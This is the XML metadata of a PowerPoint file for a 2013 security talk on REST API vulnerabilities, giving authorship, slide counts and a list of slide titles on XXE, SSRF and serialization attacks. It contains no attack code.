          <a:xfrm>
            <a:off x="7170019" y="4556762"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211318370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12462</TotalTime>
  <Words>3439</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>459</Paragraphs>
  <Slides>50</Slides>
  <Notes>2</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RESTing On Your Laurels Will Get You Pwned</vt:lpstr>
      <vt:lpstr>Goals and Main Point</vt:lpstr>
      <vt:lpstr>Causes of REST Vulnerabilities</vt:lpstr>
      <vt:lpstr>Application Architecture Background</vt:lpstr>
      <vt:lpstr>Internal Network of a Data Center</vt:lpstr>
      <vt:lpstr>Internal Network of a Data Center</vt:lpstr>
      <vt:lpstr>REST History</vt:lpstr>
      <vt:lpstr>REST History (con’t)</vt:lpstr>
      <vt:lpstr>Attacking Backend Systems (Old School)</vt:lpstr>
      <vt:lpstr>Attacking An Internal Network (Old School)</vt:lpstr>
      <vt:lpstr>Attacking An Internal Network (REST style)</vt:lpstr>
      <vt:lpstr>REST is Self Describing</vt:lpstr>
      <vt:lpstr>REST is Self Describing</vt:lpstr>
      <vt:lpstr>Especially for NoSQL REST APIs</vt:lpstr>
      <vt:lpstr>HBase REST API</vt:lpstr>
      <vt:lpstr>Couch DB REST API</vt:lpstr>
      <vt:lpstr>Neo4j REST API</vt:lpstr>
      <vt:lpstr>Mongo DB REST API</vt:lpstr>
      <vt:lpstr>Cassandra.io REST API</vt:lpstr>
      <vt:lpstr>REST Input Types and Interfaces</vt:lpstr>
      <vt:lpstr>REST Input Types and Interfaces</vt:lpstr>
      <vt:lpstr>XML Related Vulnerabilities</vt:lpstr>
      <vt:lpstr>XML Related Vulnerabilities</vt:lpstr>
      <vt:lpstr>XXE (File Disclosure and Port Scanning)</vt:lpstr>
      <vt:lpstr>XXE Today</vt:lpstr>
      <vt:lpstr>XXE (Remote Code Execution)</vt:lpstr>
      <vt:lpstr>XML Serialization Vulns</vt:lpstr>
      <vt:lpstr>XML Serialization Remote Code Execution – XStream (Demo)</vt:lpstr>
      <vt:lpstr>XML Serialization Remote Code Execution – XMLDecoder(Demo)</vt:lpstr>
      <vt:lpstr>XML Serialization Mass Assignment (Demo)</vt:lpstr>
      <vt:lpstr>URLs to backend REST APIs are built with concatenation instead of URIBuilder (Prepared URI)</vt:lpstr>
      <vt:lpstr>SSRF (Server Side Request Forgery) to Internal REST APIs</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SSRF</vt:lpstr>
      <vt:lpstr>Extended HPPP (HTTP Path &amp; Parameter Pollution)</vt:lpstr>
      <vt:lpstr>Extended HPPP (Apply Your Knowledge I)</vt:lpstr>
      <vt:lpstr>Inbred Architecture</vt:lpstr>
      <vt:lpstr>Extensions in REST frameworks that enhance development of REST functionality at the expense of security</vt:lpstr>
      <vt:lpstr>Rest Extensions Remote Code Execution(Demo)</vt:lpstr>
      <vt:lpstr>Rest Extensions Data Exfiltration Example (Couch DB)</vt:lpstr>
      <vt:lpstr>Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB)</vt:lpstr>
      <vt:lpstr>Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB)</vt:lpstr>
      <vt:lpstr>Reliance on incorrectly implemented protocols (SAML, XML Signature, XML Encryption, etc.)</vt:lpstr>
      <vt:lpstr>Incorrect assumptions of REST application behavior</vt:lpstr>
      <vt:lpstr>Incorrect assumptions of REST application behavior (Example 1)</vt:lpstr>
      <vt:lpstr>Incorrect assumptions of application REST behavior (Example 1)</vt:lpstr>
      <vt:lpstr>REST provides for dynamic URLs and dynamic resource allocation  Example Case Study</vt:lpstr>
      <vt:lpstr>Example Case Study Exploit</vt:lpstr>
      <vt:lpstr>REST Attacking Summary</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RESTing On Your Laurels Will Get You Powned</dc:title>
  <dc:creator>Abraham Kang</dc:creator>
  <cp:lastModifiedBy>Alvaro Muñoz</cp:lastModifiedBy>
  <cp:revision>109</cp:revision>
  <cp:lastPrinted>2013-07-09T15:02:18Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-07-04T01:46:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-02-13T20:35:10Z</dcterms:modified>
</cp:coreProperties>
</file>